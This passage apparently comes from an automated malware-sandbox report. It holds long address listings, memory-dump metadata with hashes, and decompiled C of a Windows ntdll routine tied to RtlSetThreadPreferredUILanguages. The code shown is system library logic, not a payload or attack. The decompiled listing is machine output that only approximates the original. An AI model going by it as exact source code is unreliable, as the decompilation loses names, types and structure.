                        			}



















































                        0x02bc2584
                        0x02bc2586
                        0x02bc2590
                        0x02bc2596
                        0x02bc2597
                        0x02bc2598
                        0x02bc2599
                        0x02bc259e
                        0x02bc25a4
                        0x02bc25a9
                        0x02bc25ac
                        0x02bc25ae
                        0x02bc25b1
                        0x02bc25b2
                        0x02bc25b5
                        0x02bc25b8
                        0x02bc25bb
                        0x02bc25bc
                        0x02bc25bf
                        0x02bc25c2
                        0x02bc25c5
                        0x02bc25c6
                        0x02bc25cb
                        0x02bc25ce
                        0x02bc25d8
                        0x02bc25dd
                        0x02bc25de
                        0x02bc25e1
                        0x02bc25e3
                        0x02bc25e9
                        0x02bc26da
                        0x02bc26da
                        0x02bc26dd
                        0x02bc26e2
                        0x02c05b56
                        0x00000000
                        0x02bc26e8
                        0x02bc26f9
                        0x02bc26fb
                        0x02bc26fe
                        0x02bc2700
                        0x02c05b60
                        0x00000000
                        0x02bc2706
                        0x02bc2706
                        0x02bc270a
                        0x02bc270a
                        0x02bc270d
                        0x02bc2713
                        0x02bc2716
                        0x02bc2718
                        0x02bc271c
                        0x02bc271e
                        0x02c05b6c
                        0x02c05b6f
                        0x02c05b7f
                        0x02c05b89
                        0x02c05b8e
                        0x02c05b93
                        0x02c05b96
                        0x02c05b9c
                        0x02c05ba0
                        0x02c05ba3
                        0x02c05bab
                        0x02c05bb0
                        0x02c05bb3
                        0x02c05bb3
                        0x02c05ba3
                        0x02bc2724
                        0x02bc2726
                        0x02bc2729
                        0x02bc272c
                        0x02bc279d
                        0x02bc279d
                        0x02bc27a0
                        0x02bc27a2
                        0x00000000
                        0x02bc272e
                        0x02bc272e
                        0x02bc2731
                        0x02bc2734
                        0x02bc2734
                        0x02bc2736
                        0x02c05bc1
                        0x02c05bc1
                        0x02c05bc4
                        0x00000000
                        0x02c05bca
                        0x02c05bca
                        0x02c05bcd
                        0x00000000
                        0x02c05bd3
                        0x00000000
                        0x02c05bd3
                        0x02c05bcd
                        0x02bc273c
                        0x02bc273c
                        0x02bc2742
                        0x02bc2747
                        0x02bc274a
                        0x02bc274d
                        0x02bc2750
                        0x00000000
                        0x02bc2756
                        0x02bc2756
                        0x00000000
                        0x02bc2902
                        0x02bc2908
                        0x02bc290b
                        0x00000000
                        0x02bc2911
                        0x02bc291c
                        0x02bc2921
                        0x00000000
                        0x02bc2921
                        0x00000000
                        0x00000000
                        0x02bc2880
                        0x02bc2887
                        0x02bc288c
                        0x00000000
                        0x00000000
                        0x02bc2805
                        0x02bc280a
                        0x02bc2814
                        0x02bc2816
                        0x00000000
                        0x00000000
                        0x02bc281e
                        0x02bc2821
                        0x02bc2823
                        0x00000000
                        0x02bc2829
                        0x02bc2829
                        0x02bc2831
                        0x02bc283c
                        0x02bc283e
                        0x00000000
                        0x02bc283e
                        0x00000000
                        0x00000000
                        0x02bc284e
                        0x02bc2850
                        0x02bc2851
                        0x02bc2854
                        0x02bc2857
                        0x02bc285a
                        0x02bc285c
                        0x02bc285d
                        0x00000000
                        0x00000000
                        0x02bc275d
                        0x02bc2761
                        0x00000000
                        0x02bc2767
                        0x02bc276e
                        0x02bc2773
                        0x02bc2773
                        0x02bc2776
                        0x02bc2778
                        0x02bc277e
                        0x02bc277e
                        0x02bc2781
                        0x02bc2781
                        0x02bc2783
                        0x02bc2784
                        0x00000000
                        0x00000000
                        0x02c05bd8
                        0x02c05bde
                        0x02c05be4
                        0x02c05be6
                        0x02c05be8
                        0x02c05be9
                        0x02c05bee
                        0x02c05bf8
                        0x02c05bff
                        0x02c05c01
                        0x02c05c04
                        0x02c05c07
                        0x02c05c0b
                        0x02c05c0d
                        0x02c05c0d
                        0x02c05c15
                        0x02c05c18
                        0x02c05c1b
                        0x02c05c1b
                        0x02c05c1e
                        0x00000000
                        0x00000000
                        0x02bc28c3
                        0x02bc28c8
                        0x02bc28d2
                        0x02bc28d4
                        0x02bc28d8
                        0x02bc28db
                        0x02c05c26
                        0x02c05c28
                        0x02c05c2d
                        0x02c05c2d
                        0x00000000
                        0x00000000
                        0x02c05c34
                        0x02c05c36
                        0x02c05c49
                        0x02c05c4e
                        0x02c05c54
                        0x02c05c5b
                        0x02c05c5d
                        0x02c05c60
                        0x02bc2788
                        0x02bc2788
                        0x02bc278b
                        0x02bc278e
                        0x02bc278e
                        0x02bc278e
                        0x02bc2791
                        0x00000000
                        0x00000000
                        0x02bc2756
                        0x02bc2750
                        0x00000000
                        0x02bc2794
                        0x02bc2794
                        0x02bc2795
                        0x02bc2798
                        0x02bc2798
                        0x00000000
                        0x02bc2734
                        0x02bc272c
                        0x02bc2700
                        0x02bc25ef
                        0x02bc25ef
                        0x02bc25ef
                        0x02bc25f2
                        0x02bc25f8
                        0x00000000
                        0x00000000
                        0x02bc25fe
                        0x00000000
                        0x02bc28e6
                        0x02bc28ec
                        0x02bc28ef
                        0x02bc28f5
                        0x02bc28f8
                        0x02bc28f8
                        0x00000000
                        0x02bc28f8
                        0x00000000
                        0x00000000
                        0x02bc2866
                        0x02bc2866
                        0x02bc2876
                        0x02bc2879
                        0x00000000
                        0x00000000
                        0x02bc27e0
                        0x02bc27e7
                        0x02bc27e9
                        0x02bc27eb
                        0x02c05afd
                        0x00000000
                        0x02c05afd
                        0x00000000
                        0x00000000
                        0x02bc2633
                        0x02bc2638
                        0x02bc263b
                        0x02bc263c
                        0x02bc263e
                        0x02bc2640
                        0x02bc2642
                        0x02bc2647
                        0x02bc2649
                        0x02bc264e
                        0x02bc2650
                        0x02bc2653
                        0x02bc2659
                        0x02bc26a2
                        0x02bc26a7
                        0x02bc26ac
                        0x02bc26b2
                        0x02c05b11
                        0x02c05b15
                        0x02c05b17
                        0x00000000
                        0x02bc26b8
                        0x02bc26b8
                        0x02bc26ba
                        0x02bc27a6
                        0x02bc27a6
                        0x02bc27a9
                        0x02bc27ab
                        0x02bc27b9
                        0x02bc27b9
                        0x02bc27be
                        0x02bc27c1
                        0x02bc27c3
                        0x02bc27c5
                        0x02bc27c7
                        0x02c05c74
                        0x02c05c79
                        0x02c05c79
                        0x02bc27c7
                        0x00000000
                        0x02bc26c0
                        0x02bc26c0
                        0x02bc26c3
                        0x02bc26c6
                        0x02bc26c6
                        0x02bc26c9
                        0x02bc26c9
                        0x00000000
                        0x02bc26c9
                        0x02bc26ba
                        0x02bc265b
                        0x02bc265b
                        0x02bc265e
                        0x02bc2667
                        0x02bc266d
                        0x02bc2677
                        0x02bc267c
                        0x02bc267f
                        0x02bc2681
                        0x02c05b49
                        0x02c05b4e
                        0x02bc27cd
                        0x02bc27d0
                        0x02bc27d1
                        0x02bc27d2
                        0x02bc27d4
                        0x02bc27dd
                        0x02bc2687
                        0x02bc2687
                        0x02bc268a
                        0x02bc268b
                        0x02bc268e
                        0x02bc268f
                        0x02bc2691
                        0x02bc2696
                        0x02bc2698
                        0x02bc269d
                        0x02bc269f
                        0x00000000
                        0x02bc269f
                        0x02bc2681
                        0x00000000
                        0x00000000
                        0x02bc2846
                        0x00000000
                        0x00000000
                        0x02bc2605
                        0x02bc260a
                        0x02bc260c
                        0x02bc2611
                        0x02bc2616
                        0x02bc2619
                        0x02bc2619
                        0x02bc261e
                        0x00000000
                        0x02bc2624
                        0x02bc2627
                        0x02bc2627
                        0x00000000
                        0x00000000
                        0x02c05b1f
                        0x00000000
                        0x00000000
                        0x02bc2894
                        0x02bc289b
                        0x02bc289d
                        0x02bc28a1
                        0x02c05b2b
                        0x02c05b2e
                        0x02c05b2e
                        0x02bc28a7
                        0x02bc28a9
                        0x02c05b04
                        0x02c05b09
                        0x02c05b09
                        0x02c05b09
                        0x00000000
                        0x00000000
                        0x02c05b35
                        0x02c05b3c
                        0x02bc28fb
                        0x02bc28fb
                        0x02bc26cc
                        0x02bc26cc
                        0x02bc26d0
                        0x00000000
                        0x02bc26d2
                        0x02bc26d2
                        0x00000000
                        0x02bc26d2
                        0x00000000
                        0x00000000
                        0x02bc25fe
                        0x02bc292d
                        0x02bc2930
                        0x02bc2935
                        0x02bc293e
                        0x02bc2944
                        0x02bc294e
                        0x02bc294f
                        0x02bc2952
                        0x02bc2962
                        0x02bc296b
                        0x02bc2972
                        0x02bc2973
                        0x02bc2976
                        0x02bc297d
                        0x02bc297e
                        0x02bc297f
                        0x02bc2980
                        0x02bc2981
                        0x02bc2982
                        0x02bc2983
                        0x02bc2984
                        0x02bc2985
                        0x02bc2986
                        0x02bc2987
                        0x02bc2988
                        0x02bc2989
                        0x02bc298a
                        0x02bc298b
                        0x02bc298c
                        0x02bc298d
                        0x02bc298e
                        0x02bc298f
                        0x02bc2990
                        0x02bc2992
                        0x02bc2997
                        0x02bc29a3
                        0x02bc29a6
                        0x02bc29ab
                        0x02bc29ad
                        0x02bc29b0
                        0x02bc29b2
                        0x02c05c80
                        0x02bc29b8
                        0x02bc29b8
                        0x02bc29bb
                        0x02bc29c0
                        0x02bc29c5
                        0x02bc29c6
                        0x02bc29c6
                        0x02bc29c9
                        0x02bc29cb
                        0x00000000
                        0x00000000
                        0x02bc29cd
                        0x02bc29d0
                        0x02bc29d9
                        0x02bc29db
                        0x02bc29dd
                        0x02bc2a7f
                        0x02bc2a84
                        0x02bc2a87
                        0x02bc2a89
                        0x02c05ca1
                        0x02c05ca3
                        0x00000000
                        0x02bc2a8f
                        0x02bc2a8f
                        0x00000000
                        0x02bc2a8f
                        0x00000000
                        0x02bc29e3
                        0x02bc29e3
                        0x02bc29e3
                        0x00000000
                        0x02bc29e3
                        0x02bc29dd
                        0x00000000
                        0x02bc29db
                        0x02bc29e6
                        0x02bc29e9
                        0x02bc29eb
                        0x02bc29ed
                        0x02bc29f3
                        0x02bc29f5
                        0x02bc29f8
                        0x02bc29fa
                        0x02bc2a97
                        0x02bc2a9a
                        0x02bc2a9d
                        0x02bc2add
                        0x00000000
                        0x02bc2a9f
                        0x02bc2aa2
                        0x02bc2aa5
                        0x02bc2aa8
                        0x02bc2aab
                        0x02c05cab
                        0x02c05caf
                        0x02c05cc5
                        0x02c05cda
                        0x02c05cdc
                        0x02c05cdf
                        0x02c05ce5
                        0x00000000
                        0x02c05ceb
                        0x02c05ced
                        0x02c05cee
                        0x00000000
                        0x02c05cee
                        0x02c05cb1
                        0x02c05cb4
                        0x02c05cb9
                        0x02c05cbb
                        0x00000000
                        0x02c05cbd
                        0x02c05cbd
                        0x00000000
                        0x02c05cbd
                        0x02c05cbb
                        0x02bc2ab1
                        0x02bc2ab1
                        0x02bc2ac4
                        0x02bc2ac6
                        0x02bc2ac6
                        0x00000000
                        0x02bc2ac6
                        0x02bc2aab
                        0x00000000
                        0x02bc2a00
                        0x02bc2a09
                        0x02bc2a0e
                        0x02bc2a21
                        0x02bc2a24
                        0x02bc2a35
                        0x02bc2a3a
                        0x02bc2a3d
                        0x02bc2a42
                        0x02bc2a59
                        0x02bc2a59
                        0x02bc2a5c
                        0x02bc2a5f
                        0x02bc2a5f
                        0x02bc29fa
                        0x02bc29f3
                        0x02bc2a64
                        0x02bc2a64
                        0x02bc2a6b
                        0x02bc2a6b
                        0x02bc2a6d
                        0x02bc2a72
                        0x02bc2a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: 2d90630edf667038575000402b284cf3eb2ee9784fd76e118d5ce93a39017ff1
                        • Instruction ID: 2abbbed5311e4c3811b3bdf733c3653ef8c7b7ce2de476e6d27b0316614d936f
                        • Opcode Fuzzy Hash: 2d90630edf667038575000402b284cf3eb2ee9784fd76e118d5ce93a39017ff1
                        • Instruction Fuzzy Hash: 80C19EB5E00219DBDB15DF98D890BBDB7B1FF48744F6481A9E801AB250E774AD41CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02BCFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                        				char _v5;
                        				signed int _v8;
                        				signed int _v12;
                        				char _v16;
                        				char _v17;
                        				char _v20;
                        				signed int _v24;
                        				char _v28;
                        				char _v32;
                        				signed int _v40;
                        				void* __ecx;
                        				void* __edi;
                        				void* __ebp;
                        				signed int _t73;
                        				intOrPtr* _t75;
                        				signed int _t77;
                        				signed int _t79;
                        				signed int _t81;
                        				intOrPtr _t83;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t95;
                        				signed int _t96;
                        				signed int _t106;
                        				signed int _t108;
                        				signed int _t114;
                        				signed int _t116;
                        				signed int _t118;
                        				signed int _t122;
                        				signed int _t123;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				intOrPtr* _t134;
                        				signed int _t138;
                        				signed int _t141;
                        				signed int _t147;
                        				intOrPtr _t153;
                        				signed int _t154;
                        				signed int _t155;
                        				signed int _t170;
                        				void* _t174;
                        				signed int _t176;
                        				signed int _t177;
                        
                        				_t129 = __ebx;
                        				_push(_t132);
                        				_push(__esi);
                        				_t174 = _t132;
                        				_t73 =  !( *( *(_t174 + 0x18)));
                        				if(_t73 >= 0) {
                        					L5:
                        					return _t73;
                        				} else {
                        					E02BAEEF0(0x2c87b60);
                        					_t134 =  *0x2c87b84; // 0x77ad7b80
                        					_t2 = _t174 + 0x24; // 0x24
                        					_t75 = _t2;
                        					if( *_t134 != 0x2c87b80) {
                        						_push(3);
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c87b60);
                        						_t170 = _v8;
                        						_v28 = 0;
                        						_v40 = 0;
                        						_v24 = 0;
                        						_v17 = 0;
                        						_v32 = 0;
                        						__eflags = _t170 & 0xffff7cf2;
                        						if((_t170 & 0xffff7cf2) != 0) {
                        							L43:
                        							_t77 = 0xc000000d;
                        						} else {
                        							_t79 = _t170 & 0x0000000c;
                        							__eflags = _t79;
                        							if(_t79 != 0) {
                        								__eflags = _t79 - 0xc;
                        								if(_t79 == 0xc) {
                        									goto L43;
                        								} else {
                        									goto L9;
                        								}
                        							} else {
                        								_t170 = _t170 | 0x00000008;
                        								__eflags = _t170;
                        								L9:
                        								_t81 = _t170 & 0x00000300;
                        								__eflags = _t81 - 0x300;
                        								if(_t81 == 0x300) {
                        									goto L43;
                        								} else {
                        									_t138 = _t170 & 0x00000001;
                        									__eflags = _t138;
                        									_v24 = _t138;
                        									if(_t138 != 0) {
                        										__eflags = _t81;
                        										if(_t81 != 0) {
                        											goto L43;
                        										} else {
                        											goto L11;
                        										}
                        									} else {
                        										L11:
                        										_push(_t129);
                        										_t77 = E02BA6D90( &_v20);
                        										_t130 = _t77;
                        										__eflags = _t130;
                        										if(_t130 >= 0) {
                        											_push(_t174);
                        											__eflags = _t170 & 0x00000301;
                        											if((_t170 & 0x00000301) == 0) {
                        												_t176 = _a8;
                        												__eflags = _t176;
                        												if(__eflags == 0) {
                        													L64:
                        													_t83 =  *[fs:0x18];
                        													_t177 = 0;
                        													__eflags =  *(_t83 + 0xfb8);
                        													if( *(_t83 + 0xfb8) != 0) {
                        														E02BA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                        													}
                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                        													goto L15;
                        												} else {
                        													asm("sbb edx, edx");
                        													_t114 = E02C38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                        													__eflags = _t114;
                        													if(_t114 < 0) {
                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                        														E02B9B150();
                        													}
                        													_t116 = E02C36D81(_t176,  &_v16);
                        													__eflags = _t116;
                        													if(_t116 >= 0) {
                        														__eflags = _v16 - 2;
                        														if(_v16 < 2) {
                        															L56:
                        															_t118 = E02BA75CE(_v20, 5, 0);
                        															__eflags = _t118;
                        															if(_t118 < 0) {
                        																L67:
                        																_t130 = 0xc0000017;
                        																goto L32;
                        															} else {
                        																__eflags = _v12;
                        																if(_v12 == 0) {
                        																	goto L67;
                        																} else {
                        																	_t153 =  *0x2c88638; // 0x0
                        																	_t122 = L02BA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                        																	_t154 = _v12;
                        																	_t130 = _t122;
                        																	__eflags = _t130;
                        																	if(_t130 >= 0) {
                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                        																		__eflags = _t123;
                        																		if(_t123 != 0) {
                        																			_t155 = _a12;
                        																			__eflags = _t155;
                        																			if(_t155 != 0) {
                        																				 *_t155 = _t123;
                        																			}
                        																			goto L64;
                        																		} else {
                        																			E02BA76E2(_t154);
                        																			goto L41;
                        																		}
                        																	} else {
                        																		E02BA76E2(_t154);
                        																		_t177 = 0;
                        																		goto L18;
                        																	}
                        																}
                        															}
                        														} else {
                        															__eflags =  *_t176;
                        															if( *_t176 != 0) {
                        																goto L56;
                        															} else {
                        																__eflags =  *(_t176 + 2);
                        																if( *(_t176 + 2) == 0) {
                        																	goto L64;
                        																} else {
                        																	goto L56;
                        																}
                        															}
                        														}
                        													} else {
                        														_t130 = 0xc000000d;
                        														goto L32;
                        													}
                        												}
                        												goto L35;
                        											} else {
                        												__eflags = _a8;
                        												if(_a8 != 0) {
                        													_t77 = 0xc000000d;
                        												} else {
                        													_v5 = 1;
                        													L02BCFCE3(_v20, _t170);
                        													_t177 = 0;
                        													__eflags = 0;
                        													L15:
                        													_t85 =  *[fs:0x18];
                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                        														L18:
                        														__eflags = _t130;
                        														if(_t130 != 0) {
                        															goto L32;
                        														} else {
                        															__eflags = _v5 - _t130;
                        															if(_v5 == _t130) {
                        																goto L32;
                        															} else {
                        																_t86 =  *[fs:0x18];
                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                        																}
                        																__eflags = _t177;
                        																if(_t177 == 0) {
                        																	L31:
                        																	__eflags = 0;
                        																	L02BA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                        																	goto L32;
                        																} else {
                        																	__eflags = _v24;
                        																	_t91 =  *(_t177 + 0x20);
                        																	if(_v24 != 0) {
                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                        																		goto L31;
                        																	} else {
                        																		_t141 = _t91 & 0x00000040;
                        																		__eflags = _t170 & 0x00000100;
                        																		if((_t170 & 0x00000100) == 0) {
                        																			__eflags = _t141;
                        																			if(_t141 == 0) {
                        																				L74:
                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                        																				goto L27;
                        																			} else {
                        																				_t177 = E02BCFD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					goto L42;
                        																				} else {
                        																					_t130 = E02BCFD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						_t68 = _t177 + 0x20;
                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                        																						__eflags =  *_t68;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L74;
                        																					}
                        																				}
                        																			}
                        																			goto L35;
                        																		} else {
                        																			__eflags = _t141;
                        																			if(_t141 != 0) {
                        																				_t177 = E02BCFD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					L42:
                        																					_t77 = 0xc0000001;
                        																					goto L33;
                        																				} else {
                        																					_t130 = E02BCFD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L26;
                        																					}
                        																				}
                        																				goto L35;
                        																			} else {
                        																				L26:
                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                        																				__eflags = _t94;
                        																				L27:
                        																				 *(_t177 + 0x20) = _t94;
                        																				__eflags = _t170 & 0x00008000;
                        																				if((_t170 & 0x00008000) != 0) {
                        																					_t95 = _a12;
                        																					__eflags = _t95;
                        																					if(_t95 != 0) {
                        																						_t96 =  *_t95;
                        																						__eflags = _t96;
                        																						if(_t96 != 0) {
                        																							 *((short*)(_t177 + 0x22)) = 0;
                        																							_t40 = _t177 + 0x20;
                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                        																							__eflags =  *_t40;
                        																						}
                        																					}
                        																				}
                        																				goto L31;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        														}
                        													} else {
                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                        														_t106 =  *(_t147 + 0x20);
                        														__eflags = _t106 & 0x00000040;
                        														if((_t106 & 0x00000040) != 0) {
                        															_t147 = E02BCFD22(_t147);
                        															__eflags = _t147;
                        															if(_t147 == 0) {
                        																L41:
                        																_t130 = 0xc0000001;
                        																L32:
                        																_t77 = _t130;
                        																goto L33;
                        															} else {
                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                        																_t106 =  *(_t147 + 0x20);
                        																goto L17;
                        															}
                        															goto L35;
                        														} else {
                        															L17:
                        															_t108 = _t106 | 0x00000080;
                        															__eflags = _t108;
                        															 *(_t147 + 0x20) = _t108;
                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                        															goto L18;
                        														}
                        													}
                        												}
                        											}
                        											L33:
                        										}
                        									}
                        								}
                        							}
                        						}
                        						L35:
                        						return _t77;
                        					} else {
                        						 *_t75 = 0x2c87b80;
                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                        						 *_t134 = _t75;
                        						 *0x2c87b84 = _t75;
                        						_t73 = E02BAEB70(_t134, 0x2c87b60);
                        						if( *0x2c87b20 != 0) {
                        							_t73 =  *( *[fs:0x30] + 0xc);
                        							if( *((char*)(_t73 + 0x28)) == 0) {
                        								_t73 = E02BAFF60( *0x2c87b20);
                        							}
                        						}
                        						goto L5;
                        					}
                        				}
                        			}

















































                        0x02bcfab0
                        0x02bcfab2
                        0x02bcfab3
                        0x02bcfab4
                        0x02bcfabc
                        0x02bcfac0
                        0x02bcfb14
                        0x02bcfb17
                        0x02bcfac2
                        0x02bcfac8
                        0x02bcfacd
                        0x02bcfad3
                        0x02bcfad3
                        0x02bcfadd
                        0x02bcfb18
                        0x02bcfb1b
                        0x02bcfb1d
                        0x02bcfb1e
                        0x02bcfb1f
                        0x02bcfb20
                        0x02bcfb21
                        0x02bcfb22
                        0x02bcfb23
                        0x02bcfb24
                        0x02bcfb25
                        0x02bcfb26
                        0x02bcfb27
                        0x02bcfb28
                        0x02bcfb29
                        0x02bcfb2a
                        0x02bcfb2b
                        0x02bcfb2c
                        0x02bcfb2d
                        0x02bcfb2e
                        0x02bcfb2f
                        0x02bcfb3a
                        0x02bcfb3b
                        0x02bcfb3e
                        0x02bcfb41
                        0x02bcfb44
                        0x02bcfb47
                        0x02bcfb4a
                        0x02bcfb4d
                        0x02bcfb53
                        0x02c0bdcb
                        0x02c0bdcb
                        0x02bcfb59
                        0x02bcfb5b
                        0x02bcfb5b
                        0x02bcfb5e
                        0x02c0bdd5
                        0x02c0bdd8
                        0x00000000
                        0x02c0bdda
                        0x00000000
                        0x02c0bdda
                        0x02bcfb64
                        0x02bcfb64
                        0x02bcfb64
                        0x02bcfb67
                        0x02bcfb6e
                        0x02bcfb70
                        0x02bcfb72
                        0x00000000
                        0x02bcfb78
                        0x02bcfb7a
                        0x02bcfb7a
                        0x02bcfb7d
                        0x02bcfb80
                        0x02c0bddf
                        0x02c0bde1
                        0x00000000
                        0x02c0bde3
                        0x00000000
                        0x02c0bde3
                        0x02bcfb86
                        0x02bcfb86
                        0x02bcfb86
                        0x02bcfb8b
                        0x02bcfb90
                        0x02bcfb92
                        0x02bcfb94
                        0x02bcfb9a
                        0x02bcfb9b
                        0x02bcfba1
                        0x02c0bde8
                        0x02c0bdeb
                        0x02c0bded
                        0x02c0beb5
                        0x02c0beb5
                        0x02c0bebb
                        0x02c0bebd
                        0x02c0bec3
                        0x02c0bed2
                        0x02c0bedd
                        0x02c0bedd
                        0x02c0beed
                        0x00000000
                        0x02c0bdf3
                        0x02c0bdfe
                        0x02c0be06
                        0x02c0be0b
                        0x02c0be0d
                        0x02c0be0f
                        0x02c0be14
                        0x02c0be19
                        0x02c0be20
                        0x02c0be25
                        0x02c0be27
                        0x02c0be35
                        0x02c0be39
                        0x02c0be46
                        0x02c0be4f
                        0x02c0be54
                        0x02c0be56
                        0x02c0bef8
                        0x02c0bef8
                        0x00000000
                        0x02c0be5c
                        0x02c0be5c
                        0x02c0be60
                        0x00000000
                        0x02c0be66
                        0x02c0be66
                        0x02c0be7f
                        0x02c0be84
                        0x02c0be87
                        0x02c0be89
                        0x02c0be8b
                        0x02c0be99
                        0x02c0be9d
                        0x02c0bea0
                        0x02c0beac
                        0x02c0beaf
                        0x02c0beb1
                        0x02c0beb3
                        0x02c0beb3
                        0x00000000
                        0x02c0bea2
                        0x02c0bea2
                        0x00000000
                        0x02c0bea2
                        0x02c0be8d
                        0x02c0be8d
                        0x02c0be92
                        0x00000000
                        0x02c0be92
                        0x02c0be8b
                        0x02c0be60
                        0x02c0be3b
                        0x02c0be3b
                        0x02c0be3e
                        0x00000000
                        0x02c0be40
                        0x02c0be40
                        0x02c0be44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c0be44
                        0x02c0be3e
                        0x02c0be29
                        0x02c0be29
                        0x00000000
                        0x02c0be29
                        0x02c0be27
                        0x00000000
                        0x02bcfba7
                        0x02bcfba7
                        0x02bcfbab
                        0x02c0bf02
                        0x02bcfbb1
                        0x02bcfbb1
                        0x02bcfbb8
                        0x02bcfbbd
                        0x02bcfbbd
                        0x02bcfbbf
                        0x02bcfbbf
                        0x02bcfbc5
                        0x02bcfbcb
                        0x02bcfbf8
                        0x02bcfbf8
                        0x02bcfbfa
                        0x00000000
                        0x02bcfc00
                        0x02bcfc00
                        0x02bcfc03
                        0x00000000
                        0x02bcfc09
                        0x02bcfc09
                        0x02bcfc0f
                        0x02bcfc15
                        0x02bcfc23
                        0x02bcfc23
                        0x02bcfc25
                        0x02bcfc27
                        0x02bcfc75
                        0x02bcfc7c
                        0x02bcfc84
                        0x00000000
                        0x02bcfc29
                        0x02bcfc29
                        0x02bcfc2d
                        0x02bcfc30
                        0x02c0bf0f
                        0x00000000
                        0x02bcfc36
                        0x02bcfc38
                        0x02bcfc3b
                        0x02bcfc41
                        0x02c0bf17
                        0x02c0bf19
                        0x02c0bf48
                        0x02c0bf4b
                        0x00000000
                        0x02c0bf1b
                        0x02c0bf22
                        0x02c0bf24
                        0x02c0bf26
                        0x00000000
                        0x02c0bf2c
                        0x02c0bf37
                        0x02c0bf39
                        0x02c0bf3b
                        0x00000000
                        0x02c0bf41
                        0x02c0bf41
                        0x02c0bf41
                        0x02c0bf41
                        0x02c0bf45
                        0x00000000
                        0x02c0bf45
                        0x02c0bf3b
                        0x02c0bf26
                        0x00000000
                        0x02bcfc47
                        0x02bcfc47
                        0x02bcfc49
                        0x02bcfcb2
                        0x02bcfcb4
                        0x02bcfcb6
                        0x02bcfcdc
                        0x02bcfcdc
                        0x00000000
                        0x02bcfcb8
                        0x02bcfcc3
                        0x02bcfcc5
                        0x02bcfcc7
                        0x00000000
                        0x02bcfcc9
                        0x02bcfcc9
                        0x02bcfccd
                        0x00000000
                        0x02bcfccd
                        0x02bcfcc7
                        0x00000000
                        0x02bcfc4b
                        0x02bcfc4b
                        0x02bcfc4e
                        0x02bcfc4e
                        0x02bcfc51
                        0x02bcfc51
                        0x02bcfc54
                        0x02bcfc5a
                        0x02bcfc5c
                        0x02bcfc5f
                        0x02bcfc61
                        0x02bcfc63
                        0x02bcfc65
                        0x02bcfc67
                        0x02bcfc6e
                        0x02bcfc72
                        0x02bcfc72
                        0x02bcfc72
                        0x02bcfc72
                        0x02bcfc67
                        0x02bcfc61
                        0x00000000
                        0x02bcfc5a
                        0x02bcfc49
                        0x02bcfc41
                        0x02bcfc30
                        0x02bcfc27
                        0x02bcfc03
                        0x02bcfbcd
                        0x02bcfbd3
                        0x02bcfbd9
                        0x02bcfbdc
                        0x02bcfbde
                        0x02bcfc99
                        0x02bcfc9b
                        0x02bcfc9d
                        0x02bcfcd5
                        0x02bcfcd5
                        0x02bcfc89
                        0x02bcfc89
                        0x00000000
                        0x02bcfc9f
                        0x02bcfc9f
                        0x02bcfca3
                        0x00000000
                        0x02bcfca3
                        0x00000000
                        0x02bcfbe4
                        0x02bcfbe4
                        0x02bcfbe4
                        0x02bcfbe4
                        0x02bcfbe9
                        0x02bcfbf2
                        0x00000000
                        0x02bcfbf2
                        0x02bcfbde
                        0x02bcfbcb
                        0x02bcfbab
                        0x02bcfc8b
                        0x02bcfc8b
                        0x02bcfc8c
                        0x02bcfb80
